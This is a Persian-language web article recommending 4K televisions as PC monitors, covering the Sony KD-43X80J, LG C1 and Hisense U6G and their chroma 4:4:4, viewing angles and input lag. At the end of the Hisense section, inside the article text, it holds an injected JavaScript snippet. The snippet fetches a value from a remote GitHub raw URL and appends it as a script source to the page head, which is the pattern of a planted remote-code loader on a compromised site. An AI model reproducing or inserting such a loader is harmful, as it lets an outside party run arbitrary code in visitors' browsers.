دسته‌بندی نشده

تلویزیون های برتر 4K فورکی برای مانیتور کامپیوتر

مانیتور های کامپیوتر و تلویزیون ها تقریبا در یک دسته قرار دارند. تلویزیون ها معمولا قابلیت های پیشرفته تری برای پردازش تصاویر نسبت به مانیتور ها دارند. تلویزیون ها در اندازه بزرگ تر ارائه می شوند و دارای بلندگو های توکار می باشند و همچنین مجهز به تیونر هستند. بر روی برخی از تلویزیون ها حالت PC وجود دارد که باعث حذف پردازش های اضافی تصاویر می شود و تاخیر ورودی پایین تری را ارائه می دهد. مانیتور ها معمولا دارای درگاه DisplayPort می باشد که در تلویزیون ها پیدا نمی شوند و هنور نمی توان تلویزیونی با پورت دیسپلی را پیدا کرد.
مهم ترین مساله در انتخاب یک تلویزیون به عنوان مانیتور این است که تلویزیون دارای قابلیت نمایش  chroma 4:4:4 و زاویه دید گسترده باشد. قطعا انتخاب نمایشگر LED نسبت به OLED برای مانیتور بهتر است اما نمایشگر های اولد نیز می توانند برای تماشا محتویات مختلف و کاربرد های گوناگون مناسب باشند. 

بهترین تلویزیون LED برای مانیتور
سونی KD-43X80J

اگر به دنبال یک تلویزیون در اندازه کوچک هستند بهترین انتخاب برای مانیتور استفاده از تلویزیون ال ای دی سونی مدل KD-43X80J می باشد. این تلویزیون یک مدل میان رده است و دارای پنل ADS است که فوق العاده برای PC می باشد. زاویه دید گسترده این مدل تصاویر را در قسمت های حاشیه ای با کیفیت مناسب و دقت عالی نمایش می دهد. این تلویزیون در سایز 43 اینچ عرضه می شود بنابراین برای محیط های کوچک بسیار مناسب است.
نمایشگر فورکی 4K این تلویزیون سونی تصاویری دقیق و بسیار تیز را نمایش می دهد. این تلویزیون از لایه های RBG ساب پیکسل استفاده می کند بنابراین مانند دیگر پنل ها بر روی دقت تکست ها تاثیر نمی گزارد. بر خلاف دیگر تلویزیون ها X80J در تماشا طولانی مدل پنل چشم افراد را اذیت نمی کند. در این تلویزیون تاخیر ورودی بسیار پایین است بنابراین پاسخگویی سریعی در مانیتور ایجاد می شود. این ویژگی می تواند گیمر ها را بسیار خوشنود کند.
این تلویزیون 43 اینچ بسیاری از رزولوشن ها را ساپورت می کند اما متاسفانه به سرعت پردازش یا رفرش ریت 60 هرتز محدود شده است. 

بهترین تلویزیون OLED برای مانیتور
ال جی C1

تلویزیون اولد ال جی مدل C1 بهترین تلویزیون برای استفاده به عنوان مانیتور است. این تلویزیون از مدل های بالا رده است و برای مانیتور نیز بسیار مناسب است. مانند دیگر پنل های اولد پیکسل های روی این نمایشگر به صورت خودکار عمل می کنند و کنتراستی نزدیک به بی نهایت و رنگ های مشکی عمیق را ارائه می دهند. این تلویزیون دارای طراحی زیبا است و با تعداد زیادی از سایز های کوچک و بزرگ ارائه می شود و همچنین دارای امکانات بی نظیر و پیشرفته ای مانند پشتیبانی از VRR, ALLM و HDMI 2.1 است. این مدل از ال جی دارای پنل 120 هرتز است و بسیاری از رزولوشن ها را پشتیبانی می کند. chroma 4:4:4 که برای نمایش واضح متن ها بسیار مهم است روی این پنل ساپورت می شود. تاخیر ورودی در این تلویزیون بسیار پایین است و می تواند تجربه دسکتاب بسیار سریع با پاسخگویی بالا و حرکات روان را به کاریران می دهد. با پشتیبانی از FreeSync و G-SYNC گیمیر ها از این تلویزیون بسیار راضی خواهند بود. تجربه HDR در این تلویزیون بسیار عالی است و رنج رنگی گسترده و نسبت کنتراست بالا روی پنل برای این محتویات ایجاد می شود. 

بهترین تلویزیون با قیمت مناسب برای مانیتور
هایسنس U6G

تلویزیون هایسنس مدل U6G نسبت به قیمت مناسبی که دارد برای PC بسیار مناسب و کاربردی می باشد. این تلویزیون یک مدل همه کاره است که برای استفاده به عنوان مانیتور PC بسیار مناسب است. سایز بندی این تلویزیون نسبت به مدل های قبلی از اینچ بزرگ تر 50 اینچ شروع می شود و تا 75 اینچ در 4 سایز ارائه شده است. این تلویزیون در هر دو محیط تاریک و روشن عملکردی عالی دارد. استفاده از پنل VA برای این تلویزیون باعث نسبت کنتراست بالا ان و یکنواختی عالی می شود. حرکات در این مدل کاملا روان و شفاف هستند و پاسخگویی تلویزیون بسیار سریع است و تاخیر ورودی پایین تلویزیون تجربه دیداری عالی را ایجاد خواهد کرد. U6G همچنین در نمایش chroma 4:4:4 هیچ مشکلی ندارد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *